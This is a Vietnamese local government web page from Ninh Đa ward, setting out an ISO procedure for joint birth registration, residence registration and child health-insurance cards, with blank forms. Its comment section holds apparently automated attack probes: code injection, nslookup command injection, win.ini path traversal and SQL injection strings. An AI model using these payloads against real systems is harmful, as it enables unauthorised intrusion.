? ISO LĨNH VỰC TƯ PHÁP | Ủy Ban Nhân Dân Phường Ninh Đa | uy-ban-nhan-dan-phuong-ninh-da
Liên kết website
Bản đồ hành chính
ban do bac ho Cổng thông tin điện tửTỉnh Khánh HòaCổng thông tin điện tử tỉnh Khánh HòaCổng thông tin điện tử chính phủHệ thống vb pháp luậtTruong xa
Thống kê truy cập
Chuyên mục cải cách hành chính

ISO LĨNH VỰC TƯ PHÁP

 ISO LĨNH VỰC TƯ PHÁP
QUY TRÌNH Liên thông các thủ tục hành chính về đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ em dưới 6 tuổi

MỤC LỤC

SỬA ĐỔI THÔNG TIN DẠNG VĂN BẢN

 1. MỤC ĐÍCH
 2. PHẠM VI
 3. TÀI LIỆU VIỆN DẪN
 4. ĐỊNH NGHĨA/VIẾT TẮT
 5. NỘI DUNG QUY TRÌNH
 6. BIỂU MẪU
 7. THÔNG TIN DẠNG VĂN BẢN CẦN LƯU

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Soạn thảo

Xem xét

Phê duyệt

Họ tên

Trần Văn Thuận

Cao Khánh Toàn

Ngô Quang Khánh

Chữ ký

 

 

 

 

 

 

 

 

Chức vụ

CC. Tư pháp-Hộ tịch

Phó Chủ tịch UBND

Chủ tịch UBND

SỬA ĐỔI THÔNG TIN DẠNG VĂN BẢN

Số phiếu yêu cầu sửa đổi/ bổ sung

Trang / Phần liên quan việc sửa đổi

Mô tả nội dung sửa đổi

Lần ban hành / Lần sửa đổi

Ngày ban hành

   04

Trang 11, phần 5.9

Quyết định số 1187/QĐ-UBND ngày 27/4/2017 của UBND tỉnh Khánh Hòa về việc công bố thủ tục hành chính theo cơ chế một cửa liên thông: đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ em dưới 6 tuổi; đăng ký khai tử, xóa đăng ký thường trú trên địa bàn tỉnh Khánh Hòa. 

02

22/5/2017

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

1. MỤC ĐÍCH

Quy trình này quy định cách thức thực hiện Liên thông các thủ tục hành chính: Đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ dưới 6 tuổi cho cá nhân.

2. PHẠM VI

-   Áp dụng cho cá nhân Liên thông các thủ tục hành chính: Đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ dưới 6 tuổi tại UBND phường.

-   Cán bộ, công chức và lãnh đạo UBND phường.

3. TÀI LIỆU VIỆN DẪN

-   Hệ thống Quản lý chất lượng theo tiêu chuẩn ISO 9001-2008;

-   Văn bản pháp luật quy định tại Mục 5.9 Quy trình này.

-   Quy định thực hiện cơ chế một cửa, cơ chế một cửa liên thông hiện hành.

4. ĐỊNH NGHĨA/ VIẾT TẮT

Văn bản liên quan: Là 01 trong các văn bản sau:

-   Giấy khai sinh, Đăng ký thường trú, Bảo hiểm y tế trường hợp 1;

-   Thông báo từ chối giải quyết hồ sơ trường hợp 2.

-   Hồ sơ TCCD:      Là các giấy tờ phải nộp tại Mục 5.2

-   UBND phường:   Ủy ban nhân dân phường.

-   CCTP-HT:           Công chức Tư pháp – Hộ tịch

-   CA phường:         Công an phường.

-   VT:                      Văn thư.

-   LĐ:                      Lãnh đạo.

-   TCCD:                 Tổ chức/ Công dân.

-   BHYT:                 Bảo hiểm y tế.

-   BHXH:                Bảo hiểm xã hội.

-   TN&TKQ:           Tiếp nhận và trả kết quả.

-   TH:                      Trường hợp 1.

 

 

 

 

 

 

 

 

5.NỘI DUNG QUY TRÌNH

5.1

Điều kiện thực hiện TTHC

 

- Cá nhân có yêu cầu thực hiện liên thông các thủ tục hành chính có quyền lựa chọn áp dụng hoặc không áp dụng thực hiện liên thông các thủ tục hành chính.

- Trường hợp người nộp hồ sơ có yêu cầu nhận kết quả từng loại thủ tục trực tiếp tại cơ quan có thẩm quyền giải quyết thì khi nộp hồ sơ tại UBND cấp xã phải yêu cầu cụ thể để ghi vào phiếu hẹn và người nộp hồ sơ sẽ được trực tiếp nhận kết quả theo yêu cầu tại các cơ quan có thẩm quyền giải quyết.

- Liên thông các thủ tục hành chính đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ em dưới 6 tuổi: Áp dụng đối với trường hợp đăng ký khai sinh thuộc thẩm quyền giải quyết của UBND cấp xã và các cơ quan có thẩm quyền giải quyết TTHC trên cùng địa bàn một huyện, thị xã, thành phố thuộc tỉnh.

- Cá nhân có yêu cầu thực hiện liên thông các thủ tục hành chính không có điều kiện trực tiếp đến Ủy ban nhân dân cấp xã để nộp hồ sơ thì có thể ủy quyền cho người khác làm thay. Việc ủy quyền thực hiện theo quy định của pháp luật hiện hành.

5.2

Thành phần hồ sơ

Bản chính

Bản sao

a.

Giấy tờ phải xuất trình

 

 

 

1. Giấy chứng nhận kết hôn của cha mẹ trẻ em (nếu cha, mẹ của trẻ em có đăng ký kết hôn);

x

 

2. Chứng minh nhân dân/hộ chiếu của người đi đăng ký để xác định về cá nhân người đó;

x

 

3.    Sổ hộ khẩu/Sổ đăng ký tạm trú của người mẹ (hoặc người cha), người nuôi dưỡng (đối với trẻ bị bỏ rơi)/giấy tờ chứng minh nơi trẻ đang sinh sống trên thực tế để làm căn cứ xác định thẩm quyền đăng ký hộ tịch theo quy định.

x

 

b.

Hồ sơ nộp

 

Đăng ký khai sinh:

 

 

1. Tờ khai đăng ký khai sinh theo mẫu.

x

 

2. Giấy chứng sinh; trường hợp không có Giấy chứng sinh thì nộp văn bản của người làm chứng xác nhận về việc sinh; nếu không có người làm chứng thì phải có giấy cam đoan về việc sinh;

x

 

3. Trường hợp trẻ em bị bỏ rơi thì phải có biên bản về việc trẻ bị bỏ rơi do cơ quan có thẩm quyền lập.

x

 

4. Trường hợp khai sinh cho trẻ em sinh ra do mang thai hộ phải có thêm văn bản xác nhận của cơ sở y tế đã thực hiện kỹ thuật hỗ trợ sinh sản cho việc mang thai hộ.

x

 

5. Văn bản ủy quyền được công chứng, chứng thực theo quy định của pháp luật đối với trường hợp ủy quyền thực hiện việc đăng ký khai sinh. Nếu người được ủy quyền là ông, bà, cha, mẹ, con, vợ, chồng, anh, chị, em ruột của người ủy quyền thỉ văn bản ủy quyền phải công chứng, chứng thực, nhưng phải có giấy tờ chứng minh mối quan hệ với người ủy quyền.

x

 

 

Đăng ký thường trú

 

 

1. Bản sao khai sinh;

 

x

2. Phiếu báo thay đổi hộ khẩu, nhân khẩu (Mẫu HK02)

x

 

3. Bản chính sổ hộ khẩu;

x

 

4. Trường hợp trẻ em có cha, mẹ nhưng không đăng ký thường trú cùng cha, mẹ mà đăng ký thường trú cùng với người khác: Văn bản thể hiện ý kiến của cha, mẹ có xác nhận của Ủy ban nhân dân phường; ý kiến đồng ý của chủ hộ và Sổ hộ khẩu của chủ hộ.

x

 

 

Cấp thẻ BHYT:

 

 

1. Tờ khai tham gia BHYT (Mẫu TK1-TS);

X

 

2. Danh sách đề nghị cấp thẻ BHYT (Mẫu D03-TS)

x

 

5.3

Số lượng hồ sơ

 

01 bộ

5.4

Thời gian xử lý

 

09 ngày làm việc kể từ ngày nhận đủ hồ sơ theo quy định.

Trường hợp hồ sơ chưa đầy đủ, cần hoàn thiện thêm thì không quá 11 ngày làm việc

5.5

Nơi thực hiện quy trình

 

Bộ phận TN&TKQ UBND phường

5.6

Lệ phí

 

Theo quy định

5.7

Mẫu đơn, mẫu tờ khai

 

- Tờ khai đăng ký khai sinh.

- Phiếu thay đổi hộ khẩu, nhân khẩu;

- Tờ khai tham gia BHYT;

- Danh sách đề nghị cấp thẻ BHYT.

5.8

Quy trình xử lý công việc

TT

Trình tự

Trách nhiệm

Thời gian

Biểu mẫu/Kết quả

Bước 1

Tiếp nhận hồ sơ:

- Nếu hồ sơ chưa  đầy đủ, hướng dẫn cụ thể bằng Phiếu hướng dẫn hoàn thiện hồ sơ và kết thúc quy trình;

- Hồ sơ đầy đủ:

+ Tiếp nhận hồ sơ và hẹn trả kết quả;

+ Vào sổ theo dõi tiếp nhận và trả kết quả (nếu không thực hiện được trên phần mềm Một cửa điện tử);

+Chuyển bước tiếp theo.

Bộ phận TN&TKQ

Chuyển ngay

- Hồ sơ TCCN;

- Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

- Sổ theo dõi tiếp nhận và trả kết quả (nếu không thực hiện được trên phần mềm Một cửa điện tử);

- Giấy tiếp nhận hồ sơ và hẹn trả kết quả.

Bước 2

Thẩm định hồ sơ:

 

 

- Hồ sơ TCCN;

- Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

- Thông báo hẹn lại thời gian trả kết quả (nếu có xác minh hồ sơ);

- Giấy tiếp nhận hồ sơ và hẹn trả kết quả.

- Văn bản liên quan.

Thẩm tra, xác minh hồ sơ (nếu có):

- Dự thảo Thông báo hẹn lại thời gian trả kết quả trình LĐ UBND phê duyệt, gửi cho TCCD.

- Xác minh hồ sơ.

CC. TP-HT

Trong ngày

Thẩm định hồ sơ:

- Trường hợp hồ sơ phù hợp, dự thảo kết quả giải quyết TTHC (TH 1);

- Trường hợp hồ sơ không phù hợp , dự thảo Thông báo từ chối giải quyết hồ sơ (TH 2).

- Chuyển bước tiếp theo

Bước 3

Xem xét và phê duyệt:

- Xem xét dự thảo văn bản liên quan;

- Nếu đồng ý, phê duyệt văn bản và chuyển bước tiếp theo;

- Nếu không đồng ý, chuyển lại bước 2.

Lãnh đạo UBND phường

0,5 ngày

- Văn bản liên quan.

Bước 4

Vào sổ, đóng dấu và chuyển Bộ phận TN&TKQ.

Văn Thư

0,5 ngày

- Văn bản liên quan.

Bước 5

- Chuyển hồ sơ đăng ký thường trú kèm lệ phí (nếu có) đến bộ phận có thẩm quyền đăng ký thường trú.

- Lập và chuyển hồ sơ cấp thẻ BHYT đến cơ quan BHXH cấp huyện để thực hiện cấp thẻ BHYT.

CC. TP-HT

02 ngày

- Văn bản liên quan.

Bước 6

Thẩm định hồ sơ:

- Trường hợp hồ sơ phù hợp, dự thảo kết quả giải quyết TTHC;

Xem xét và hoàn tất thủ tục đăng ký nhập sinh:

- Đồng ý, ký vào văn bản liên quan, hoàn tất việc đăng ký nhập sinh và chuyển bước tiếp theo.

- Không đồng ý, chuyển lại bước 5.

- Trả hồ sơ theo yêu cầu

Công an phường,

Công an thị xã Ninh Hòa.

01 ngày

- Hồ sơ TCCN;

- Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

- Thông báo hẹn lại thời gian trả kết quả (nếu có xác minh hồ sơ);

- Giấy tiếp nhận hồ sơ và hẹn trả kết quả.

- Văn bản liên quan.

Bước 7

Thẩm định hồ sơ:

- Trường hợp hồ sơ phù hợp, dự thảo kết quả giải quyết TTHC.

Xem xét và hoàn tất thủ tục cấp thẻ BHYT:

- Đồng ý, ký vào văn bản liên quan, in thẻ BHYT và chuyển bước tiếp theo.

- Không đồng ý, chuyển lại bước 5.

- Trả hồ sơ theo yêu cầu

BHXH thị xã Ninh Hòa

5 ngày

- Hồ sơ TCCN;

- Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

- Thông báo hẹn lại thời gian trả kết quả (nếu có xác minh hồ sơ);

- Giấy tiếp nhận hồ sơ và hẹn trả kết quả.

- Văn bản liên quan.

Bước 8

Trả kết quả cho TCCD, lưu thông tin dạng văn bản và kết thúc quy trình

Bộ phận TN&TKQ

 

 

Trường hợp 1:

- Ghi thông tin vào các sổ:

+ Sổ theo dõi tiếp nhận và trả kết quả;

+ Sổ khác (nếu có).

- Hướng dẫn TCCN ký tên vào sổ khác (nếu có).

- Trả kết quả giải quyết TTHC.

- Lưu thông tin dạng văn bản và kết thúc quy trình.

 

 

- Hồ sơ TCCN;

- Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

- Thông báo hẹn lại thời gian trả kết quả (nếu có xác minh hồ sơ);

- Giấy tiếp nhận hồ sơ và hẹn trả kết quả.

- Văn bản liên quan.

- Sổ khác (nếu có).

Trường hợp 2:

- Ghi thông tin vào sổ theo dõi tiếp nhận và trả kết quả;

- Trả hồ sơ cho CD và Thông báo từ chối giải quyết hồ sơ;

- Lưu hồ sơ, kết thúc quy trình.

 

 

- Thông báo từ chối giải quyết hồ sơ.

- Giấy tiếp nhận hồ sơ và hẹn trả kết quả;

5.9

Cơ sở pháp lý

 

- Văn bản hợp nhất Luật cư trú số 03/VBHN-VPQH ngày 11/7/2013 của Văn phòng Quốc hội;

- Luật Bảo hiểm y tế năm 2008 được sửa đổi bổ sung tại Luật sửa đổi, bổ sung một số điều của Luật Bảo hiểm y tế năm 2014;

- Luật Hộ tịch năm 2014;

- Nghị định Nghị định 123/2015/NĐ-CP ngày 15/11/2015 của Chính phủ quy định chi tiết một số điều và biện pháp thi hành Luật Hộ tịch;

- Thông tư 15/2015TT-BTP ngày 16/11/2015 của Bộ tư pháp quy định chi tiết thi hành một số điều của Luật hộ tịch và Nghị định số 123/2015/NĐ-CP ngày 15/11/2015 của Chính phủ quy định chi tiết một số điều và biện pháp thi hành Luật Hộ tịch;

- Nghị định số 31/2014/NĐ-CP ngày 18 tháng 4 năm 2014 của Chính phủ quy định chi tiết một số điều và biện pháp thi hành Luật Cư trú;

- Thông tư số 35/2014/TT-BCA ngày 09/9/2014 của Bộ Công an quy định chi tiết thi hành một số điều của Luật Cư trú và Nghị định 31/2014/NĐ-CP ngày 18 tháng 4 năm 2014 của Chính phủ quy định chi tiết một số điều và biện pháp thi hành Luật Cư trú.

- Thông tư số 36/2014/TT-BCA ngày 09/9/2014 của Bộ Công an quy định về biểu mẫu sử dụng trong đăng ký, quản lý cư trú.

- Thông tư số 61/2014/TT-BCA ngày 20/11/2014 của Bộ Công an quy định về quy trình đăng ký cư trú;

- Thông tư liên tịch số 05/2015/TTLT-BTP-BCA-BYT ngày 15/5/2015 của Bộ Tư pháp, Bộ Công an, Bộ Y tế hướng dẫn thực hiện liên thông các thủ tục hành chính về đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ em dưới 6 tuổi.

- Quyết định số 1018/QĐ-BHXH ngày 10/10/2014 của Bảo hiểm xã hội Việt Nam sửa đổi bổ sung một số nội dung tại các quyết định ban hành quy định quản lý thu, chi bảo hiểm xã hội, bảo hiểm y tế;

-     Nghị Quyết số 39/2016/NQ-HĐND ngày 14/12/2016 của UBND tỉnh Khánh Hòa về việc quy định mức thu, nộp, quản lý và sử dụng lệ phí hộ tịch, lệ phí đăng ký cư trú và lệ phí cấp chứng minh nhân dân trên địa bàn tỉnh Khánh Hòa.

- Quyết định số 1187/QĐ-UBND ngày 27/4/2017 của UBND tỉnh Khánh Hòa về việc công bố thủ tục hành chính theo cơ chế một cửa liên thông: đăng ký khai sinh, đăng ký thường trú, cấp thẻ bảo hiểm y tế cho trẻ em dưới 6 tuổi; đăng ký khai tử, xóa đăng ký thường trú trên địa bàn tỉnh Khánh Hòa.         

             

 

6. BIỂU MẪU

TT

Tên biểu mẫu

Trích dẫn

 1.  

Phiếu theo dõi quá trình giải quyết công việc

Theo mẫu của Phần mềm Một cửa điện tử

 1.  

Thông báo từ chối giải quyết hồ sơ

Theo mẫu số 06 Quyết định số 14/2015/QĐ-UBND ngày 30/6/2015

 1.  

Thông báo hẹn lại thời gian trả kết quả.

Theo mẫu số 07 Quyết định số 14/2015/QĐ-UBND ngày 30/6/2015

 1.  

Phiếu hướng dẫn hoàn thiện hồ sơ

Theo mẫu số 01 Quyết định số 14/2015/QĐ-UBND ngày 30/6/2015

 1.  

Sổ theo dõi tiếp nhận và trả kết quả (nếu không thực hiện được trên phần mềm Một cửa điện tử)

Theo mẫu số 02 Quyết định số 14/2015/QĐ-UBND ngày 30/6/2015

 1.  

Giấy tiếp nhận hồ sơ và hẹn trả kết quả

Theo mẫu số 03 Quyết định số 14/2015/QĐ-UBND ngày 30/6/2015 Hoặc Phần mềm Một cửa điện tử.

 1.  

Giấy khai sinh

Theo Phụ lục 1 của Thông tư số 15/2015/TT-BTP ngày 16/11/2015.

 1.  

Tờ khai đăng ký khai sinh

Theo Phụ lục 5 của Thông tư số 15/2015/TT-BTP ngày 16/11/2015.

 1.  

Sổ đăng ký khai sinh

Theo Phụ lục 2 của Thông tư số 15/2015/TT-BTP ngày 16/11/2015.

 1.  

Phiếu báo thay đổi hộ khẩu, nhân khẩu; 

Mẫu HK02 ban hành theo Thông tư số 36/2014/TT-BCA ngày 9/9/2014

 1.  

Danh sách người tham gia BHYT  Mẫu DK05

Theo QĐ số: 959/QĐ-BHXH ngày 09/9/2015 của BHXH Việt Nam

 

7.   THÔNG TIN DNG VĂN BẢN CẦN LƯU:

TT

Tên các loại giấy tờ lưu

Trường hợp 1

 1.  

Hồ sơ TCCN;

 1.  

Sổ đăng ký khai sinh;

 1.  

Sổ khác (nếu có);

 1.  

Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

 1.  

Phiếu theo dõi quá trình giải quyết công việc (Trên phần mềm Một cửa);

 1.  

Thông báo hẹn lại thời gian trả kết quả (nếu có thẩm tra, xác minh);

 1.  

Bằng chứng thẩm tra, xác minh(nếu có thẩm tra, xác minh);

 1.  

Giấy tiếp nhận hồ sơ và hẹn trả kết quả;

 1.  

Sổ theo dõi tiếp nhận và trả kết quả (Trên phần mềm Một cửa;

Trường hợp 2:

 1.  

Thông báo từ chối giải quyết hồ sơ;

 1.  

Thông báo hẹn lại thời gian trả kết quả (nếu có thẩm tra, xác minh);

 1.  

Bằng chứng thẩm tra, xác minh(nếu có thẩm tra, xác minh);

 1.  

Phiếu theo dõi quá trình giải quyết công việc; (Trên phần mềm Một cửa);

 1.  

Phiếu hướng dẫn hoàn thiện hồ sơ (nếu có);

 1.  

Giấy tiếp nhận hồ sơ và hẹn trả kết quả;

 1.  

Sổ theo dõi tiếp nhận và trả kết quả. (Trên phần mềm Một cửa);

Lưu tại Bộ phận TP-HT không quá 01 năm, sau đó chuyển hồ sơ xuống phòng lưu trữ của UBND phường và lưu trữ theo quy định hiện hành.

 

 

 

 

 

 

 

 

 

Phụ lục 5 của Thông tư số 15/2015/TT-BTP ngày 16/11/2015.

 

CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM

Độc lập - Tự do - Hạnh phúc

 

 
 

 

 

 

TỜ KHAI ĐĂNG KÝ KHAI SINH

 

        Kính gửi: (1)........................................................................

 

Họ, chữ đệm, tên người yêu cầu: .....................................................................

Giấy tờ tùy thân: (2)........................................................................................

Nơi cư trú: (3).....................................................................................................

Quan hệ với người được khai sinh: ..............................................................

Đề nghị cơ quan đăng ký khai sinh cho người dưới đây:

Họ, chữ đệm, tên:.......................................................................................

Ngày, tháng, năm sinh:............................ghi bằng chữ:................................

Nơi sinh: (4).…………………………………………………………...............

Giới tính:....................... Dân tộc: . ...........Quốc tịch: .................................

Quê quán: ....................................................................................................

Họ, chữ đệm, tên cha: …………………………………….…......................

Năm sinh: ............. Dân tộc: ..................Quốc tịch: ……………..................

Nơi cư trú: (3) ................................................................................................

Họ, chữ đệm, tên mẹ: …………………………………………………….......

Năm sinh: ...................... Dân tộc: ...........Quốc tịch: ……………………...

Nơi cư trú: (3) ................................................................................................

Tôi cam đoan nội dung đề nghị đăng ký khai sinh trên đây là đúng sự thật, được sự thỏa thuận nhất trí của các bên liên quan theo quy định pháp luật.

Tôi chịu hoàn toàn trách nhiệm trước pháp luật về nội dung cam đoan của mình.

                       Làm tại: ……………., ngày ........... tháng ......... năm ..............

 

Người yêu cầu

(Ký, ghi rõ họ, chữ đệm, tên)

 

..........................................

 

Chú thích:

(1) Ghi rõ tên cơ quan đăng ký khai sinh

Ví dụ: - Ủy ban nhân dân phường Điện Biên, Ba Đình, Hà Nội

           - Ủy ban nhân dân quận 1, thành phố Hồ Chí Minh

 (2) Ghi thông tin về giấy tờ tùy thân của người đi đăng ký, ghi rõ số, cơ quan cấp, ngày cấp hộ chiếu, chứng minh nhân dân  hoặc giấy tờ hợp lệ thay thế

Ví dụ: Chứng minh nhân dân số 001089123 do Công an thành phố Hà Nội cấp ngày 20/10/2014.

(3)  Ghi theo địa chỉ đăng ký thường trú; nếu không có nơi đăng ký thường trú thì ghi theo địa chỉ đăng ký tạm trú; trường hợp không có nơi đăng ký thường trú và nơi đăng ký tạm trú thì ghi theo địa chỉ đang sinh sống.         

(4) Trường hợp sinh tại cơ sở y tế thì ghi rõ tên cơ sở y tế và địa danh hành chính

Ví dụ: - Bệnh viện Phụ sản, Hà Nội

 •  Trạm y tế xã Đình Bảng, huyện Từ Sơn, tỉnh Bắc Ninh.

Trường hợp sinh ra ngoài cơ sở y tế thì ghi địa danh của 03 cấp hành chính (xã, huyện, tỉnh), nơi sinh ra.

Ví dụ: xã Đình Bảng, huyện Từ Sơn, tỉnh Bắc Ninh.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 


CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
Độc lập - Tự do - Hạnh phúc

 

Mẫu HK02 ban hành
theo TT số 36/2014/TT-BCA ngày 09/9/2014

PHIẾU BÁO THAY ĐỔI HỘ KHẨU, NHÂN KHẨU

Kính gửi: …………………………….

I. Thông tin về người viết phiếu báo

1. Họ và tên (1): …………………………………..................................... 2. Giới tính:  

3. CMND số:……….............…………………….4. Hộ chiếu số:.......................

5. Nơi thường trú:...............................................................................................

6. Địa chỉ chỗ ở hiện nay: ...................................................................................

…………...................…………………………………….. Số điện thoại liên hệ:

II. Thông tin về người có thay đổi hộ khẩu, nhân khẩu

1. Họ và tên (1):……………..................................……………………. 2. Giới tính:     

3. Ngày, tháng, năm sinh:……/….../…................ 4. Dân tộc:……..5. Quốc tịch:        

6. CMND số:……………………………. 7. Hộ chiếu số:...................................

8. Nơi sinh:.........................................................................................................

9. Nguyên quán:..................................................................................................

10. Nghề nghiệp, nơi làm việc:............................................................................

11. Nơi thường trú:.............................................................................................

12. Địa chỉ chỗ ở hiện nay: .................................................................................

…………………................……………..……………… Số điện thoại liên hệ:...

13. Họ và tên chủ hộ:……………....................………….14. Quan hệ với chủ hộ:      

15. Nội dung thay đổi hộ khẩu, nhân khẩu (2):....................................................

............................................................................................................................

16. Những người cùng thay đổi:

TT

Họ và tên

Ngày, tháng, năm sinh

Giới tính

Nơi sinh

Nghề nghiệp

Dân tộc

Quốc tịch

CMND số (hoặc Hộ chiếu số)

Quan hệ với người có thay đổi

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

……, ngày….tháng….năm…
Ý KIẾN CỦA CHỦ HỘ (3)
(Ghi rõ nội dung và ký, ghi rõ họ tên)

……, ngày….tháng….năm…
NGƯỜI VIẾT PHIẾU BÁO
(Ký, ghi rõ họ tên)

 

                       

XÁC NHẬN CỦA CÔNG AN (4):.....................................................................

............................................................................................................................

............................................................................................................................

 

 

……, ngày…tháng…năm…
TRƯỞNG CÔNG AN:………..
(Ký, ghi rõ họ tên và đóng dấu)

____________

(1) Viết chữ in hoa đủ dấu

(2) Ghi tóm tắt nội dung thay đổi hộ khẩu, nhân khẩu. Ví dụ: đăng ký thường trú, tạm trú; thay đổi nơi đăng ký thường trú, tạm trú; tách sổ hộ khẩu; điều chỉnh những thay đổi trong sổ hộ khẩu ...

(3) Ghi rõ ý kiến của chủ hộ là đồng ý cho đăng ký thường trú, đăng ký tạm trú hoặc đồng ý cho tách sổ hộ khẩu; chủ hộ ký và ghi rõ họ tên, ngày, tháng, năm.

(4) Áp dụng đối với trường hợp: Xác nhận việc công dân trước đây đã đăng ký thường trú và trường hợp cấp lại sổ hộ khẩu do bị mất.

Ghi chú: Trường hợp người viết phiếu báo cũng là người có thay đổi hộ khẩu, nhân khẩu thì công dân chỉ cần kê khai những nội dung quy định tại mục II

 

Họ tên*
Email*
Bình luận*
idpymxpl
7/7/2019 11:03:07 PM

XSOFqiCP

xxiskgeh
7/7/2019 11:03:14 PM

response.write(9814512*9062186)

xxiskgeh
7/7/2019 11:03:16 PM

'+response.write(9814512*9062186)+'

nygentyh
7/7/2019 11:03:17 PM

set|set&set

xxiskgeh
7/7/2019 11:03:19 PM

"+response.write(9814512*9062186)+"

idpymxpl
7/7/2019 11:03:21 PM

6Poj9B9u

nygentyh
7/7/2019 11:03:22 PM

$(nslookup A32M0GEW)

nygentyh
7/7/2019 11:03:28 PM

&nslookup cho0Gt6s&'\"`0&nslookup cho0Gt6s&`'

idpymxpl
7/7/2019 11:03:42 PM

Tyccrzzj

xxiskgeh
7/7/2019 11:03:56 PM

response.write(9933818*9710894)

idpymxpl
7/7/2019 11:03:56 PM

KDPhZY66

xxiskgeh
7/7/2019 11:03:57 PM

'+response.write(9933818*9710894)+'

xxiskgeh
7/7/2019 11:04:01 PM

"+response.write(9933818*9710894)+"

pmhktvpm
7/7/2019 11:04:16 PM

../../../../../../../../../../windows/win.ini

idpymxpl
7/7/2019 11:04:18 PM

lgxJ0zXE

pmhktvpm
7/7/2019 11:04:19 PM

../../../../../../../../../../boot.ini

nygentyh
7/7/2019 11:04:20 PM

set|set&set

pmhktvpm
7/7/2019 11:04:24 PM

../../../../../../../../../../windows/win.ini.jpg

nygentyh
7/7/2019 11:04:25 PM

$(nslookup Co9M3Bv5)

nygentyh
7/7/2019 11:04:27 PM

&nslookup v2EN33Ju&'\"`0&nslookup v2EN33Ju&`'

idpymxpl
7/7/2019 11:04:28 PM

pSUucsKi

pmhktvpm
7/7/2019 11:04:29 PM

������������������������������������������������windows��win.ini

pmhktvpm
7/7/2019 11:04:31 PM

................windowswin.ini

pmhktvpm
7/7/2019 11:04:40 PM

..\..\..\..\..\..\..\..\windows\win.ini

idpymxpl
7/7/2019 11:04:42 PM

2Xjihjh4

pmhktvpm
7/7/2019 11:04:44 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

pmhktvpm
7/7/2019 11:04:48 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

ebvqvbya
7/7/2019 11:04:53 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

pmhktvpm
7/7/2019 11:04:55 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

ebvqvbya
7/7/2019 11:04:56 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:04:59 PM

-1 OR 2+445-445-1=0+0+0+1 --

pmhktvpm
7/7/2019 11:05:00 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\